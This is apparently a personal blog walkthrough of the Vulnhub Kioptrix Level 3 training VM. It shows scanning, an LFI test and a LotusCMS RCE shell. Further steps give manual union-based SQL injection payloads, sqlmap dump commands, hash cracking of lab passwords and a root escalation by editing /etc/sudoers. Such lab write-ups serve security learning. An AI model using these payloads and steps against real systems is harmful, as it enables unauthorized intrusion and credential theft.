Vulnhub | Kioptrix Level 3
Hello folks ,
Welcome to 3rd installment of my Kioptrix series. If you’re interested in other parts check Kioptrix1 and Kioptrix2 , Let’s pwn kioptrix3
Installation
You can download kioptrix3 as you can andsetup it in VMware or vireualbox , don’t forget to make the network adapter of kioptrix3 and your machine as bridged
Host Discovery
Netdiscover
I used netdiscover tool to list all the hosts on my network and running it with sudo
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
There’s a web application involved, so to have everything nice and properly displayed you really need to this.
Type the following command to edit the host file and add the following piece of code into it.
Command: sudo nano /etc/hosts
Once we open up and edit the hosts file, make sure it looks similar to below:
127.0.0.1 localhost
127.0.0.1 kali
192.168.1.233 kioptrix3.com
Scanning and Enumeration
Nmap
I used nmap to scan all ports and discover open ports and services.
sudo nmap -p- -sV -O 192.168.1.233
- -sV : Probe open ports to determine service/version info
- -O : Enable OS detection
So , we have some important result as OS is Linux and apache version apache httpd 2.2.8
You can use apache scanner bash script from GitHub to check if this version vulnerable or not
Oops , this version has 41 vulnerabilities
Web server scanning
Nikto
I used nikto web server scanner tool to get info about kioptrix3 using the following command sudo nikto -h <ip>
So, we have some important result like apache version and some important directories like /phpmyadmin is for managing MySQL databases.
Fuzzing
I used dirsearch tool to bruteforcing directory and get important directories with status code 200 using the following command
dirsearch -u "url" --full-url --exclude-code 403
So, i found /index.php the main page , index.php/login login page used CMS /gallery Which calls for some pictures from the database
Port 80 : HTTP
Next, let’s fire up Firefox and take a look at the web server.
I found the main page has blog http://kioptrix3.com/index.php?system=blog which has an article and has a comment function , tested stored xss in comment function but the backend uses htmlspecialchars() function and unfortunately it didn’t succeed
LFI
I noticed that system parameter include pages from apache server so, I tested on LFI in system parameter
Unfortunately it didn’t work
I added null byte %00 and tested it again but it didn’t work
So , I added null byte before PNG extension and it succeeded
Getting Shell
I found that apache server has 2 users which I can access it if I get RCE (loneferret , dreg)
Navigate to /login page and I noticed from title is lotusCMS administrator.
Then I used searchsploitfor searching about lotusCMS to check if it has any previous cves , I found it vulnerable to php arbitrary code leading to RCE and it has an exploit on metasploit framework and you can get meterpreter session from msfconsole
But I wanted to search about exploit with bash , I get an exploit in GitHub and I get a shell with www-data user
Using the command ./lotusRCE.sh kioptrix3.com /
To get an interactive shell use command python -c 'import pty;pty.spawn(“/bin/bash")’;
Navigate to gallery directory to list the directory lsthen I found gconfig.php file , I read it with cat command cat gconfig.php and I found database credentials
Accessing Databases
Username: root
Password : fuckeyou
I used this credentials to login in phpmyadmin login page which managing MySQL databases and it succeeded
I logged in as root and i can manage databases , so it has 3 databases name i will check gallery database , dev_accounts table and i can get the md5 hash od password of (loneferret , dreg) users
Then i could decrypt hash using https://crackstation.net and the result was password of loneferret => starwars | password of dreg => Mast3r
So , after getting shell with www-data user i could to connect ssh with any user of both , let’s try to connect ssh with loneferret user using the following command ssh loneferret@192.168.1.233 password : starwars
another method to access loneferret user to using su loneferret with password : starwars
Exploiting SQLi Manually
I checked /gallerydirectory , i navigated between photos then i guessed that photos stored in database and the server call photos from it.
then i selected to photo idfrom sorting options
if you added a bad character in id parameter it would return sql error
so , id parameter may be vulnerable to error based sqli
It returned error in SQL syntax then i could balance the query with or 1=1-- then it returned all photos in this table
So , when I used
order bycommand there were 6 columns in table using the following commands
?id=1 order by 1 —?id=1 order by 2 —
?id=1 order by 3 —
?id=1 order by 4 —
?id=1 order by 5 —
?id=1 order by 6 —
?id=1 order by 7 — it returned an error so this table has 6 columns
Secondly, I used union select command to know which column is vulnerable using the following command
?id=1 union select 1,2,3,4,5,6 -- then , i noticed that column 2 , 3 vulnerable and i can get info from database Through them
Then i would exploit sqli through column 2 , 3 using the following queries
For knowing version and database name
?id=1 union select 1,version(),database(),4,5,6 --
database name : gallery
For knowing all the tables which exists in
gallerydatabase
?id=1 union select 1,table_name,2,3,4,5,6 from information_schema.tables where table_schema=gallery --
There was many of tables in gallery database so , i noticed that there was a table_name called dev_accounts it might be has some credentials
For knowing all columns which exists in
dev_accountstable
?id=1 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name = 'dev_accounts' --
Then , there was 3 columns id , username , password .
So , i could to concat three columns to retrieve these credentials using the following command
?id=1 union select 1,concat(id , '\n' , username , '\n' , password),3,4,5,6 from dev_accounts --
It was the same credentials which i found it after getting shell in gconfig.php
Exploiting SQLi using sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch
Knowing the databases name from the following command
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch --dbs
Knowing the tables_name of gallery database from the following command
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery --tables
Knowing the columns_name of dev_accounts table from gallery database using the following command
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --columns
Retrieving the crendentials of dev_accounts table from gallery database using the following command
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts -C id,username,password --dump
Privilege Escalation
After getting shell and connected to loneferret successfully , then i can escalating privileges to get root user.
So , reading the company policy file, the CEO is mandating all new employees to run sudo ht for working with files. The sudo -l confirms the fact that we can run sudo ht with root privileges
When i entered sudo htcommand , there was an error as nano error: Error opening terminal: xterm-256color I remedied this issue by executing export TERM=xterm but there are other ways if you’re so inclined, you can see this in this link stackoverflow
Run the command sudo ht and start up the HT editor, it should bring you to a screen with some options. Press F3 to select the Open file option and enter the path to the /etc/sudoers file
After the file is open, let’s add /bin/sh right after /usr/local/bin/ht, and don’t forget the comma!
I executed “sudo /bin/sh” and was presented with root.
You can find the flag in /root/Congrats.txt as shown below.
